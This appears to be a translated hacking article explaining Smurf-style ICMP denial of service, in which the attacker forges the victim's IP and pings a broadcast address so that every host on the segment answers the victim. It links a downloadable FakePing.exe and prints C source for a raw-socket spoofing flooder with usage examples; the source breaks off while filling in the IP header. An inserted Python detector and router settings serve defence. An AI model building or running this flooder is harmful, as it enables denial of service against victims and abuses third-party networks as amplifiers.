Recently many people have again been calling on everyone to "Ping some site to death". Technically, however, no matter which denial-of-service attack is used, one condition has to be satisfied: the attacker spends the least resources in exchange for the largest consumption on the victim's side. A mass Ping campaign is not only strange, it is the opposite: it spends the most resources to do the least harm to the other side. It is also absurd: a "people's war" may have been the right approach fifty years ago, but in the Internet age it does not matter how many people take part.
Today the topic is Ping. Ping is a tool that probes whether a network host exists by sending ICMP echo request messages (type 8, code 0). Long ago, some operating systems (e.g. Win95) did not handle large Ping packets properly, which gave rise to the Ping of Death attack (crashing the other side, or clogging the network, with oversized Ping packets). With upgrades to operating systems, network bandwidth and computer hardware, large Ping packets now have practically no attack effect (distributed attacks aside). If Ping packets must be used to attack another host, the only way is to exploit characteristics of the TCP/IP protocols or of the network topology to amplify the intensity of the attack as much as possible (so-called positive feedback).
Under normal circumstances, the Ping process looks like this:
Host A sends an ICMP 8,0 packet to host B
Host B sends an ICMP 0,0 reply back to host A
Because ICMP is connectionless, this gives us an opening. Suppose host A now masquerades as host C and sends an ICMP 8,0 packet to host B: what happens? Clearly, host B sends its reply to host C.
The resulting structure is as follows:
          masquerading as C               erroneous response
Host A ---------------------> Host B ------------------> Host C
In this case host A only keeps sending Ping packets and never has to process the returned EchoReply, so the effort of the attack is doubled. In fact both host B and host C are targets of the attack, while A leaves no trace of itself: a covert way to hit two birds with one stone.
With SOCK_RAW the source IP above can easily be forged, but even at double strength this has little effect against a robust operating system on a large link. So do we go back to organising mass campaigns? No: let the opponent do the amplifying for us. TCP/IP has a concept called broadcast: a broadcast address is one at which every host within the LAN receives any message sent to it (just like radio broadcasting). So what if we send an ICMP ECHO packet to a broadcast address, i.e. Ping the broadcast address? The result is a flood of responses: on Ethernet, every host that receives the broadcast answers with an ICMP_ECHOREPLY. If you Ping the LAN broadcast address from a unix machine you will see many "dup" responses, i.e. duplicate replies. On Windows you will not see this, because Microsoft's Ping program does not display multiple replies (after the first packet is received the rest are dropped), and Microsoft's systems also do not answer packets sent to the broadcast address by default, so it is best to test on a LAN with many unix hosts.
By now the clever reader knows what I intend to do. Yes: when we send a Ping request to the broadcast address while masquerading as the host to be attacked, every host on that broadcast segment responds to the Ping request, which is equivalent to multiplying the intensity of the attack by N (N = the number of hosts on the broadcast address that respond to Ping packets)!
          masquerading as C                   every host on the broadcast segment responds erroneously
Host A ---------------------> broadcast address =========================> Host C
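As an added defender-side example (not from the original article or the FakePing tool), the following Python flags both patterns described above in ICMP flow records: echo requests aimed at a broadcast address (the amplifier trigger), and a host receiving echo replies from many sources without having sent requests (the reflection victim). The flow records, network ranges and thresholds are constructed for illustration.

```python
"""Detect smurf-style ICMP reflection and broadcast amplification in flow records."""
from collections import defaultdict
from ipaddress import ip_address, ip_network

# Constructed sample flows: (timestamp, src, dst, icmp_type). Not real captures.
SAMPLE_FLOWS = [
    # A normal ping: A asks B, B answers A.
    (0.0, "10.0.0.10", "10.0.0.20", 8),
    (0.1, "10.0.0.20", "10.0.0.10", 0),
    # Spoofed echo request to the LAN broadcast address, "from" the victim.
    (1.0, "192.168.15.23", "192.168.15.255", 8),
    # Every host on the segment answers the victim.
    (1.1, "192.168.15.2", "192.168.15.23", 0),
    (1.1, "192.168.15.3", "192.168.15.23", 0),
    (1.2, "192.168.15.4", "192.168.15.23", 0),
    (1.2, "192.168.15.5", "192.168.15.23", 0),
]

# Assumed monitored networks; their broadcast addresses are the amplifiers.
LOCAL_NETS = [ip_network("192.168.15.0/24"), ip_network("10.0.0.0/24")]


def is_broadcast_target(dst):
    addr = ip_address(dst)
    return any(addr == net.broadcast_address for net in LOCAL_NETS)


def find_broadcast_echo_requests(flows):
    """Echo requests (type 8) aimed at a local broadcast address: the amplifier trigger."""
    return [(ts, src, dst) for ts, src, dst, t in flows if t == 8 and is_broadcast_target(dst)]


def find_unsolicited_replies(flows, window=2.0, min_sources=3):
    """Echo replies (type 0) to a host that sent no matching request within `window` seconds.

    A request to a broadcast address is deliberately not counted as solicitation:
    the victim never sent it, the attacker did in its name.
    Returns {victim: sorted reflecting hosts} for victims with >= min_sources reflectors.
    """
    requests = defaultdict(list)  # (requester, responder) -> [timestamps]
    for ts, src, dst, t in flows:
        if t == 8 and not is_broadcast_target(dst):
            requests[(src, dst)].append(ts)
    unsolicited = defaultdict(set)  # victim -> reflecting hosts
    for ts, src, dst, t in flows:
        if t != 0:
            continue
        if any(ts - window <= r <= ts for r in requests.get((dst, src), [])):
            continue  # matched by an earlier genuine request from dst to src
        unsolicited[dst].add(src)
    return {v: sorted(s) for v, s in unsolicited.items() if len(s) >= min_sources}
```

Removing the amplifier is the real fix: routers should not forward directed broadcasts (Cisco `no ip directed-broadcast`) and Linux hosts keep `net.ipv4.icmp_echo_ignore_broadcasts=1`, so that a Ping to the broadcast address draws no replies at all.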
I wrote a FakePing tool; you can download it from http://www.patching.net/shotgun/FakePing.exe.
Usage is FakePing.exe FakeIP TargetIP [PacketSize]; if TargetIP is a broadcast address, FakeIP becomes the real target.
The source code is as follows:
typedef struct _iphdr              // IP header definition
{
    unsigned char h_verlen;        // 4-bit header length, 4-bit IP version
    unsigned char tos;             // 8-bit type of service (TOS)
    unsigned short total_len;      // 16-bit total length (bytes)
    unsigned short ident;          // 16-bit identification
    unsigned short frag_and_flags; // 3 flag bits (plus fragment offset)
    unsigned char ttl;             // 8-bit time to live (TTL)
    unsigned char proto;           // 8-bit protocol (TCP, UDP or other)
    unsigned short checksum;       // 16-bit IP header checksum
    unsigned int sourceIP;         // 32-bit source IP address
    unsigned int destIP;           // 32-bit destination IP address
} IP_HEADER;

// ICMP header definition
typedef struct _ihdr
{
    BYTE i_type;      // 8-bit type
    BYTE i_code;      // 8-bit code
    USHORT i_cksum;   // 16-bit checksum
    USHORT i_id;      // identifier (usually the process ID is used)
    USHORT i_seq;     // message sequence number
    ULONG timestamp;  // timestamp
} ICMP_HEADER;
// checksum: computes the Internet checksum over a buffer
USHORT checksum(USHORT *buffer, int size)
{
    unsigned long cksum = 0;
    while (size > 1)
    {
        cksum += *buffer++;
        size -= sizeof(USHORT);
    }
    if (size)
    {
        cksum += *(UCHAR *)buffer;   // odd trailing byte
    }
    cksum = (cksum >> 16) + (cksum & 0xffff);   // fold carries
    cksum += (cksum >> 16);
    return (USHORT)(~cksum);
}
// FakePing main function
int main(int argc, char **argv)
{
    int datasize, ErrorCode, counter, flag;
    int TimeOut = 2000, SendSEQ = 0, PacketSize = 32;
    char SendBuf[65535] = {0};
    WSADATA wsaData;
    SOCKET SockRaw = (SOCKET)NULL;
    struct sockaddr_in DestAddr;
    IP_HEADER ip_header;
    ICMP_HEADER icmp_header;
    char FakeSourceIp[20], DestIp[20];

    // Accept the command line parameters
    if (argc < 3)
    {
        printf("FakePing by Shotgun\n");
        printf("This program can do Ping-Flooding from a FakeIP\n");
        printf("Using a BroadCast IP as the FakeIP will enhance the effect\n");
        printf("Email:\n");
        printf("Shotgun@Xici.Net\n");
        printf("HomePage:\n");
        printf("http://It.Xici.Net\n");
        printf("http://www.Patching.Net\n");
        printf("USAGE:\nFakePing.exe FakeSourceIp DestinationIp [PacketSize]\n");
        printf("Example:\n");
        printf("FakePing.exe 192.168.15.23 192.168.15.255\n");
        printf("FakePing.exe 192.168.15.23 192.168.15.200 6400\n");
        exit(0);
    }
    strcpy(FakeSourceIp, argv[1]);
    strcpy(DestIp, argv[2]);
    if (argc > 3) PacketSize = atoi(argv[3]);
    if (PacketSize > 60000)
    {
        printf("Error! Packet size too big, must <60K\n");
        exit(0);
    }
    printf("Now Fake %s Ping %s using Packet size = %d bytes\n",
           FakeSourceIp, DestIp, PacketSize);
    printf("Ctrl+C to Quit\n");

    // Initialize SOCK_RAW
    if ((ErrorCode = WSAStartup(MAKEWORD(2, 1), &wsaData)) != 0)
    {
        fprintf(stderr, "WSAStartup failed: %d\n", ErrorCode);
        ExitProcess(STATUS_FAILED);
    }
    if ((SockRaw = WSASocket(AF_INET, SOCK_RAW, IPPROTO_RAW, NULL, 0, WSA_FLAG_OVERLAPPED)) == INVALID_SOCKET)
    {
        fprintf(stderr, "WSASocket() failed: %d\n", WSAGetLastError());
        ExitProcess(STATUS_FAILED);
    }
    flag = TRUE;
    // Set IP_HDRINCL so that we fill in the IP header ourselves
    ErrorCode = setsockopt(SockRaw, IPPROTO_IP, IP_HDRINCL, (char *)&flag, sizeof(int));
    if (ErrorCode == SOCKET_ERROR)
        printf("Set IP_HDRINCL Error!\n");

    __try
    {
        // Set the send timeout
        ErrorCode = setsockopt(SockRaw, SOL_SOCKET, SO_SNDTIMEO, (char *)&TimeOut, sizeof(TimeOut));
        if (ErrorCode == SOCKET_ERROR)
        {
            fprintf(stderr, "Failed to set send TimeOut: %d\n", WSAGetLastError());
            __leave;
        }
        memset(&DestAddr, 0, sizeof(DestAddr));
        DestAddr.sin_family = AF_INET;
        DestAddr.sin_addr.s_addr = inet_addr(DestIp);

        // Fill in the IP header
        ip_header.h_verlen = (4 << 4 | sizeof(ip_header) / sizeof(unsigned long)); // high 4 bits: IP version; low 4 bits: header length
        ip_header.total_len = htons(sizeof(IP_HEADER) + sizeof(ICMP_HEADER));      // 16-bit total length (bytes)
        ip_header.ident = 1;              // 16-bit identification
        ip_header.frag_and_flags = 0;     // 3 flag bits
        ip_header.ttl = 128;              // 8-bit TTL
        ip_header.proto = IPPROTO_ICMP;